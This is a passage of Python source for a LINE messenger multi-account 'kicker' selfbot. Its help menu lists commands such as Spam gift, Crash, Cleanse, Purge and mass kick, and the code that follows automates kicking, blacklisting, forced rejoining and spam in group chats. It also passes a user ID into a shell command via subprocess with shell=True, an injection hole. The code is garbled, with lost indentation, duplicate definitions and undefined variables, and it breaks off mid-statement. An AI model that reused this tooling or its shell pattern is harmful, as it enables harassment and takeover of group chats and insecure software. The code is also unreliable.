📲❂͜͡➣ Ban cek
📲❂͜͡➣ Clear banlist
📲❂͜͡➣ Mimic target @[name]
📲❂͜͡➣ Mimic untarget @[name]
📲❂͜͡➣ Add friend @[name]
📲❂͜͡➣ Target @[name]
📲❂͜͡➣ Del target @[name]
📲❂͜͡➣ Target list
💿══════════════💿
🎲️INVITATION🎲
⛄❂͜͡➣ Invite:[mid]
⛄❂͜͡➣ Invite user[contact]
⛄❂͜͡➣ Invite me
⛄❂͜͡➣ Join all
⛄❂͜͡➣ Join group
🌞═════════════🌞
🌛️LEAVE GROUP🌜
🔄❂͜͡➣ Bot2 @bye
🔄❂͜͡➣ Bot3 @bye
🔄❂͜͡➣ Bot4 @bye
🔄❂͜͡➣ Bot5 @bye
🔄❂͜͡➣ Bot6 @bye
🔄❂͜͡➣ Bye all
🔄❂͜͡➣ Center @bye
🔄❂͜͡➣ Bye allgroups[own]
🔄❂͜͡➣ Leave group:
⚡══════════════⚡
🍃️BOT AUTO SETTINGS🍃
☔❂͜͡➣ Auto join:on/off
☔❂͜͡➣ Auto leave:on/off
☔❂͜͡➣ Auto like:on/off
☔❂͜͡➣ Welcome message:on/off
☔❂͜͡➣ Auto notice:on/off
☔❂͜͡➣ Blockinvite:on/off
☔❂͜͡➣ Auto blockqr:on/off
☔❂͜͡➣ Namelock:on/off
☔❂͜͡➣ Mimic:on/off
☔❂͜͡➣ Auto add:on/off
☔❂͜͡➣ Check message
☔❂͜͡➣ Add message:[text]
☔❂͜͡➣ Comment:on/off
☔❂͜͡➣ Add comment:[text]
☔❂͜͡➣ Check comment
☔❂͜͡➣ Backup:on/off
☔❂͜͡➣ Gcancel:[number]
☔❂͜͡➣ Update welcome:[text]
☔❂͜͡➣ Check welcome message
🍃═════════════🍃
🌻CANCEL MODE🌻
🌽❂͜͡➣ Rejectall
🌽❂͜͡➣ Clean invites
🌽❂͜͡➣ Clear invites
🍄═════════════🍄
🍄️SUPRISE GIFT🍄
🍄❂͜͡➣ gift1-15
🍄❂͜͡➣ Spam gift
🍇═════════════🍇
🍇️NOTIFICATION LIST🍇
🍄❂͜͡➣ Group list
🍄❂͜͡➣ Banlist
🍄❂͜͡➣ Admin list
🍄❂͜͡➣ Settings
🍄❂͜͡➣ Ginfo
🍄❂͜͡➣ TL:[text]
🍄❂͜͡➣ Mimic list
🍄❂͜͡➣ Details grup:
🍄❂͜͡➣ Crash
🍄❂͜͡➣ Add all
😈════════════😈
😈★KICKER MODE★😈
😈❂͜͡➣ Cleanse
😈❂͜͡➣ Vkick @
😈❂͜͡➣ Nk [name]
😈❂͜͡➣ Kick:[mid]
😈❂͜͡➣ Purge
😈❂͜͡➣ Ulti
😈❂͜͡➣ Recover
😈═════════════😈
👮️CHAT RELATED👮
👾❂͜͡➣ Spamg[on/off][no][txt]
👾❂͜͡➣ Spam add:[text]
👾❂͜͡➣ Spam change:[text]
👾❂͜͡➣ Spam start:[number]
👾❂͜͡➣ Say [text]
👾❂͜͡➣ Me
👾❂͜͡➣ Speed
👾❂͜͡➣ Debug speed
👾❂͜͡➣ My mid
👾❂͜͡➣ Gcreator
👾❂͜͡➣ Halo
👾❂͜͡➣ Bot contact
👾❂͜͡➣ Bot mid
👾❂͜͡➣ Creator
👾❂͜͡➣ System
👾❂͜͡➣ Iconfig
👾❂͜͡➣ Kernel
👾❂͜͡➣ Cpu
👾❂͜͡➣ Responsename
👾❂͜͡➣ Help
👾❂͜͡➣ Mc:[mid]
💃═════════════💃
⌚️UTILITY⌚
💊❂͜͡➣ Lurking
💊❂͜͡➣ Lurking result
💊❂͜͡➣ Setlastpoint
💊❂͜͡➣ Viewlastseen
💊❂͜͡➣ Link open
💊❂͜͡➣ Link close
💊❂͜͡➣ Gurl
💊❂͜͡➣ Remove chat
💊❂͜͡➣ Bot restart
💰═════════════💰
🚬️CHAT RELATED🚬
💣❂͜͡➣ Lyric [][]
💣❂͜͡➣ Music [][]
💣❂͜͡➣ Wiki [text]
💣❂͜͡➣ Vidio [text]
💣❂͜͡➣ Youtube [text]
💣❂͜͡➣ Instagram [text]
💣❂͜͡➣ Translate-idn [text]
💣❂͜͡➣ Translate-eng [text]
💣❂͜͡➣ Translate-thai [text]
💣❂͜͡➣ Translate-japan [text]
💣❂͜͡➣ Emoji [expression]
💣❂͜͡➣ Info @[name]
💣❂͜͡➣ Ping
💣❂͜͡➣ Time
💣❂͜͡➣ apakah
💣❂͜͡➣ Sticker [expression]
💣❂͜͡➣ Mention all
💣❂͜͡➣ /say
💣❂͜͡➣ /say-en
💣❂͜͡➣ /say-jp
💣❂͜͡➣ Dosa @
💣❂͜͡➣ /
💣❂͜͡➣ Siapa
💰══════════════💰
📝️BROADCASTING📝
💭❂͜͡➣ Pm cast [text]
💭❂͜͡➣ Broadcast [text]
💭❂͜͡➣ Spam @[name]
🎲═════════════🎲
📲️special command📲
📲❂͜͡➣ Turn off bots
╔═══════════════════╗
☬ ᎢᎻX FᎾᎡ ᎷY ᎢᎬᎪᎷ ☬
☬ (☆─┅═ই╬ BABANG~ADHI☆)(2 s ☬Creator by https://line.me/ti/p/~boy29putra
╚═══════════════════╝
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
Amid = ki.getProfile().mid
["ub51bc97c5e4f603f1dff35e9512550d3"]
Bmid = kk.getProfile().mid
["uc2e8b426f6591045943eae5304e67c32"]
Cmid = kc.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Dmid = ks.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Emid = kt.getProfile().mid
["u0548e577b8d144d19d36617941d15062"]
Fmid = kl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid]
admin =["u350cc7408cc6cc82e056ee046131f925", "ub51bc97c5e4f603f1dff35e9512550d3"]
owner = ["u350cc7408cc6cc82e056ee046131f925", "ub51bc97c5e4f603f1dff35e9512550d3"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ღḯḉḯη-тєαм",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
wait3 = {
"copy":False,
"copy2":"target",
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
CL.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
#===========================================
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
